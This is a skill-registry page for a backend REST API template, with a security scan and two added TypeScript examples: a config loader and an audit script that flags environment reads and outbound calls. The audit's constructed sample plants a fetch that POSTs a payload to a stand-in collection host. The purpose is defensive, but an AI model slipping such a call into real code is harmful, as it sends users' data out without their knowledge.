Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

backend developer

v1.0.0

Standardized backend REST API development following layered architecture patterns (Route → Controller → Service → Repository). Use when building new REST API...

0 · 55 · 0 current · 0 all-time
by Bayu Dwi Satriyo (@bayudsatriyo)
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Benign
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The name and description match the included templates and references: Express + TypeScript + Prisma + validation + layered architecture. However, the skill's manifest declares no required env vars or binaries, while the templates and config explicitly expect Node.js/TypeScript, the Prisma client, and environment variables (DATABASE_URL, JWT_SECRET). This mismatch looks like a metadata oversight rather than malicious intent, but it matters operationally: a user relying on the manifest alone will not know which secrets the templates consume.
Instruction Scope
SKILL.md and the provided files limit actions to generating and using API templates, validation, error handling, and Prisma database access. The instructions and code do not direct the agent to read unrelated local files or exfiltrate data. They do, however, include code that reads process.env for the database and JWT configuration when run.
Install Mechanism
There is no install spec (instruction-only with template files). That lowers risk because nothing in the registry will automatically download or execute remote code. To run the templates you will need to install normal Node/npm dependencies locally (express, prisma, joi/zod, etc.).
Credentials
The code and references expect sensitive environment variables (e.g., DATABASE_URL, JWT_SECRET) and will validate/require them at startup (config/config.ts throws if missing). Yet the registry metadata lists no required env vars or primary credential. Requesting DB credentials and JWT secret is proportionate for a backend template, but the omission from metadata is an inconsistency the user should be aware of before supplying secrets to any third-party templates.
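The fail-fast startup check the scan attributes to config/config.ts, written out as an added example. This is not the skill's own file (its contents are not reproduced on this page): DATABASE_URL and JWT_SECRET come from the scan report, while the PORT and NODE_ENV handling, the minimum secret length and the accepted URL schemes are assumptions for the example. The point it demonstrates is that a loader can refuse to start without the secrets and still never echo a secret's value into a crash log.

```typescript
// Added example of a fail-fast config loader in the style the scan describes
// for config/config.ts. Not the skill's own code: DATABASE_URL and JWT_SECRET
// come from the scan report; PORT, NODE_ENV, the minimum secret length and
// the accepted URL schemes are assumptions for this example.

export interface AppConfig {
  databaseUrl: string;
  jwtSecret: string;
  port: number;
  nodeEnv: NodeEnv;
}

export class ConfigError extends Error {
  constructor(message: string) {
    super(message);
    this.name = "ConfigError";
  }
}

// The two variables the scan report says the templates require.
export const REQUIRED_ENV = ["DATABASE_URL", "JWT_SECRET"] as const;

// Assumed floor for an HMAC-signed JWT secret; shorter values are weak keys, not typos.
export const MIN_JWT_SECRET_LENGTH = 32;

// Prisma connection URL schemes accepted here (assumed list, not Prisma's full matrix).
const DATABASE_URL_SCHEME = /^(postgres(ql)?|mysql|sqlserver|mongodb(\+srv)?|file):/;

const NODE_ENVS = ["development", "test", "production"] as const;
export type NodeEnv = (typeof NODE_ENVS)[number];

function isNodeEnv(value: string): value is NodeEnv {
  return (NODE_ENVS as readonly string[]).indexOf(value) !== -1;
}

// The environment is a parameter rather than process.env so the loader can be
// exercised with throwaway values. Errors name the offending variable but never
// include its value, so a startup crash log cannot leak a secret.
export function loadConfig(env: Record<string, string | undefined>): AppConfig {
  const missing = REQUIRED_ENV.filter((name) => (env[name] ?? "").trim() === "");
  if (missing.length > 0) {
    throw new ConfigError(`Missing required environment variables: ${missing.join(", ")}`);
  }

  const databaseUrl = env.DATABASE_URL as string;
  const jwtSecret = env.JWT_SECRET as string;

  if (!DATABASE_URL_SCHEME.test(databaseUrl)) {
    throw new ConfigError("DATABASE_URL does not use a supported connection scheme");
  }
  if (jwtSecret.length < MIN_JWT_SECRET_LENGTH) {
    throw new ConfigError(`JWT_SECRET must be at least ${MIN_JWT_SECRET_LENGTH} characters`);
  }

  const port = Number(env.PORT ?? "3000");
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    throw new ConfigError("PORT must be an integer between 1 and 65535");
  }

  const nodeEnv = env.NODE_ENV ?? "development";
  if (!isNodeEnv(nodeEnv)) {
    throw new ConfigError("NODE_ENV must be development, test or production");
  }

  return { databaseUrl, jwtSecret, port, nodeEnv };
}
```

At real startup the call is loadConfig(process.env) once, with the result passed down through the route, controller, service and repository layers rather than each layer reading the environment itself. Taking the environment as a parameter is what lets you exercise the missing-variable path with throwaway values instead of production credentials, which is the same advice the scan gives about evaluating third-party templates.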
Persistence & Privilege
The skill is not always-on and does not request elevated platform privileges. It doesn't modify other skill configs or system-wide settings. Autonomous invocation is allowed by platform default but there is no sign this combines with other red flags.
What to consider before installing
This package appears to be a standard Node/TypeScript backend template (Express + Prisma + Joi/Zod patterns). Before installing or running it:
1) Inspect config/config.ts and any other file that references process.env: the templates expect DATABASE_URL and JWT_SECRET and throw if either is missing.
2) Only supply real database credentials or a JWT secret after you have read the code and trust the source; use throwaway development credentials while evaluating.
3) The registry metadata lists neither the runtime dependencies nor the required env vars. Treat that as an author oversight and confirm the required tooling (Node, npm/Yarn, TypeScript, Prisma, Express, Joi/Zod) is installed.
4) Because the source/homepage is unknown, review the included templates and references yourself for hidden endpoints or telemetry before using them in production.
If you want higher assurance, ask the skill author to declare the required env vars and to provide a source/homepage or a signed release.
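Steps 1 and 4 above amount to an audit of the template sources: which process.env names the code reads, whether the manifest declares them, and whether anything opens an outbound connection. The following added example does that audit over in-memory file contents. The sample files are constructed for the example and are not the skill's actual templates (the planted fetch call in lib/report.ts illustrates what the audit surfaces, not something found in this skill); the auditTemplate and DECLARED_ENV names and the set of network-call patterns are assumptions.

```typescript
// Added example: audit template sources before supplying real secrets.
// It lists every process.env reference, flags names the registry manifest
// does not declare, and points at lines that open outbound connections.
// SAMPLE_FILES are constructed for this example and are not the skill's
// actual templates; the function names and network-call patterns are assumptions.

export interface Finding {
  file: string;
  line: number;
  snippet: string;
}

export interface AuditResult {
  envReferenced: string[];  // every NAME read via process.env.NAME or process.env["NAME"]
  undeclaredEnv: string[];  // referenced by the code but absent from the manifest
  outboundCalls: Finding[]; // lines that look like they reach the network
}

// process.env.NAME, process.env["NAME"], process.env['NAME']
const ENV_REF = /process\.env(?:\.([A-Za-z_][A-Za-z0-9_]*)|\[\s*["']([A-Za-z_][A-Za-z0-9_]*)["']\s*\])/g;

// Call sites worth a manual look in a template that should only talk to its database (assumed set).
const OUTBOUND = /\b(fetch\s*\(|axios\s*[.(]|https?\.(?:request|get)\s*\(|net\.(?:connect|createConnection)\s*\(|new\s+WebSocket\s*\()/;

export function auditTemplate(files: Record<string, string>, declaredEnv: readonly string[]): AuditResult {
  const seen = new Set<string>();
  const outboundCalls: Finding[] = [];

  for (const file of Object.keys(files)) {
    (files[file] ?? "").split(/\r?\n/).forEach((text, idx) => {
      ENV_REF.lastIndex = 0;
      let m: RegExpExecArray | null;
      while ((m = ENV_REF.exec(text)) !== null) {
        const name = m[1] || m[2];
        if (name) seen.add(name);
      }
      if (OUTBOUND.test(text)) {
        outboundCalls.push({ file, line: idx + 1, snippet: text.trim() });
      }
    });
  }

  const envReferenced = Array.from(seen).sort();
  const declared = new Set(declaredEnv);
  return {
    envReferenced,
    undeclaredEnv: envReferenced.filter((name) => !declared.has(name)),
    outboundCalls,
  };
}

// What this listing's scan reports: the manifest declares no required env vars.
export const DECLARED_ENV: string[] = [];

// Constructed sample sources (not the skill's files) in the shape the audit expects.
export const SAMPLE_FILES: Record<string, string> = {
  "config/config.ts": [
    "const databaseUrl = process.env.DATABASE_URL;",
    "const jwtSecret = process.env['JWT_SECRET'];",
    "if (!databaseUrl || !jwtSecret) throw new Error('missing required config');",
  ].join("\n"),
  "services/user.service.ts": [
    "import { prisma } from '../lib/prisma';",
    "export const findUser = (id: string) => prisma.user.findUnique({ where: { id } });",
  ].join("\n"),
  // Deliberately planted in the constructed sample to show what the audit surfaces.
  "lib/report.ts": [
    "export const report = (payload: unknown) =>",
    "  fetch('https://example.invalid/collect', { method: 'POST', body: JSON.stringify(payload) });",
  ].join("\n"),
};
```

Run it over the unzipped skill before supplying any credentials: undeclaredEnv is the concrete form of the metadata mismatch the scan describes, and every outboundCalls entry is a line to read by hand. A regex pass is a first filter, not proof of absence; a dynamic import, a URL assembled at runtime, or a third-party package that phones home will not match these patterns, so the dependency list deserves the same scrutiny.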


latest · vk9773kp5x6xjmk800bb7yv7bj583qmcd
